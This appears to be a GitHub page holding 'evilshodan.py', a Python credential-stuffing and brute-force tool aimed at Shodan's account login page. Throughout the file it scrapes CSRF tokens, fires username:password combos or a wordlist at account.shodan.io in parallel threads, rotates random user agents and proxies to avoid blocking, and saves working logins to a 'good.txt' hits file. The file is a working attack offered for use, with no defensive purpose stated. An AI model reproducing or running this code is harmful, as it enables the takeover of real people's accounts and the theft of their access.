-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathevilshodan.py
182 lines (153 loc) Β· 7.09 KB
/
evilshodan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
import requests
from bs4 import BeautifulSoup
import datetime
import os.path
import threading
import easygui
import random
from fake_useragent import UserAgent
ua = UserAgent()
user_agent = ua.random
now = datetime.datetime.now()
date_str = now.strftime('%Y-%m-%d')
good = f'Good_{date_str}.txt'
bad = f'Bad_{date_str}.txt'
session = requests.session()
headers = {
'User-Agent': user_agent,
'Pragma': 'no-cache',
'Accept': '*/*',
}
def banner():
print("\033[91m" + """
@@@@@@@@ @@@ @@@ @@@ @@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@ @@@ @@@@@@@ @@@@@@@ @@@ @@@ @@@@@@@ @@@@@@@@
@@! @@! @@@ @@! @@! !@@ @@! @@@ @@! @@@ @@! @@@ @@!@!@@@ @@! @@@ @@! @@@ @@! @@@ @@! @@!
@!!!:! @!@ !@! !!@ @!! !@@!! @!@ !@! @!@ !@! @!@!@!@! @!@@!!@! @!@!@!@ @!@!!@! @!@ !@! @!! @!!!:!
!!: !: .:! !!: !!: !:! !!: !!! !!: !!! !!: !!! !!: !!! !!: !!! !!: :!! !!: !!! !!: !!:
: :: ::: :: : : ::.: : ::.: : : :. : :: : : : : : :: : :: : :: : : : :.:: : : : :: :::
V1
EvilShodanBrutev1 - XGHOST123 - WOLFSHOP
""" + "\033[0m")
if os.path.exists("Results") == False:
os.mkdir("Results")
os.chdir("Results")
def get_proxy():
proxy_file = easygui.fileopenbox("Select Proxy File")
proxies = []
if os.path.exists(proxy_file):
with open(proxy_file, 'r') as f:
for line in f:
line = line.strip()
if line:
proxies.append({'https': line})
return proxies
def GenFiles():
with open(good, 'w') as f:
pass
with open(bad, 'w') as a:
pass
def login(username, password, proxy, proxies):
try:
chosen = []
print("\033[93m[π] Attempting login for:\033[0m \033[92m{}\033[0m".format(username))
# Request the login page to obtain CSRF token
if not proxy:
csrfparse = session.get("https://account.shodan.io/login", headers=headers, allow_redirects=True)
else:
chosen = random.choice(proxies)
csrfparse = session.get("https://account.shodan.io/login", headers=headers, allow_redirects=True,
proxies=chosen, timeout=1)
# Check if the request was successful
if csrfparse.status_code != 200:
print("\033[91m[β] Failed to retrieve login page. Status code: {}\033[0m".format(csrfparse.status_code))
return False
soup = BeautifulSoup(csrfparse.text, 'html.parser')
csrf_input = soup.find('input', {'name': 'csrf_token'})
if csrf_input:
csrf_token = csrf_input['value']
data = f"username={username}&password={password}&grant_type=password&continue=https%3A%2F%2Faccount.shodan.io%2F&csrf_token={csrf_token}"
# Perform the login request
if not proxy:
loginrequest = session.post("https://account.shodan.io/login", headers=headers, data=data)
else:
loginrequest = session.post("https://account.shodan.io/login", headers=headers, data=data,
proxies=chosen, timeout=1)
if "Invalid username or password" in loginrequest.text:
print("\033[91m[-] Bad Credentials: \033[0m" + username + ":" + password + " π«")
with open('bad.txt', 'a') as Bad:
Bad.write(username + ":" + password + "\n")
elif "Dashboard" in loginrequest.text:
print("\033[92m[+] Hit! Credentials Found: \033[0m" + username + ":" + password + " β
")
with open('good.txt', 'a') as hits:
hits.write(username + ":" + password + "\n")
return True
else:
print("\033[91m[β οΈ] Weird Response: Please check the proxy settings!\033[0m")
if proxy:
print("\033[93m[π] Trying again with another proxy...\033[0m")
login(username, password, proxy, proxies)
else:
print("\033[91m[β] CSRF Token not found. Check the response!\033[0m")
print("\033[90m[INFO] Response text:\033[0m", csrfparse.text)
except Exception as e:
print(f"\033[91m[βοΈ] An error occurred: {e}\033[0m")
def main():
banner()
pr = None
proxies = []
print("\033[91m" + "π₯π₯π₯ Welcome to EvilShodanBrutev1 π₯π₯π₯" + "\033[0m")
print("\n\033[93mChoose an option:\033[0m")
print("\033[92m1) π Shodan Mass Bruter Combo Format User:Pass\033[0m")
print("\033[92m2) π Brute 1 Account 1 Username\033[0m")
options = int(input("\033[93mChoose An Option:\033[0m "))
if options == 1:
proxy = input("\033[93mAre you going to use Proxy (Y/N):\033[0m ").upper()
if proxy == 'Y':
pr = True
proxies = get_proxy()
elif proxy == "N":
pr = False
else:
print("\033[91mInvalid Choice\033[0m")
return # Exit the function to avoid further prompts
combo = easygui.fileopenbox("\033[94mCombo File Cred User:Pass:\033[0m")
Threadsm = int(input("\033[93mHow Many threads do you want:\033[0m "))
threads = []
with open(combo, 'r') as com:
for i in com:
par = i.rstrip('\n')
cred = par.split(":")
user = cred[0]
password = cred[1]
thread = threading.Thread(target=login, args=(user, password, pr, proxies))
threads.append(thread)
print("\033[92m[*] Starting All Threads...\033[0m")
try:
for i in range(Threadsm):
threads[i].start()
for thread in threads:
thread.join()
except Exception as e:
print(f"\033[91mError: {e}\033[0m")
elif options == 2:
username = input("\033[93mEnter The Username you Want to attack:\033[0m ")
wordlist = easygui.fileopenbox("\033[94mSelect your Wordlist for the Attack:\033[0m")
proxy = input("\033[93mDo you Want to Use Proxy (Y/N):\033[0m ").upper()
if proxy == 'Y':
pr = True
proxies = get_proxy()
elif proxy == 'N':
pr = False
else:
print("\033[91mInvalid Choice\033[0m")
return # Exit the function to avoid further prompts
with open(wordlist, 'r') as com:
for i in com:
password = i.rstrip('\n')
if login(username, password, pr, proxies):
print("\033[92m[+] Congrats! Password Found: {}\033[0m".format(password))
break
else:
print("\033[91mInvalid Option. Please try again.\033[0m")
main() # Restart the main function
main()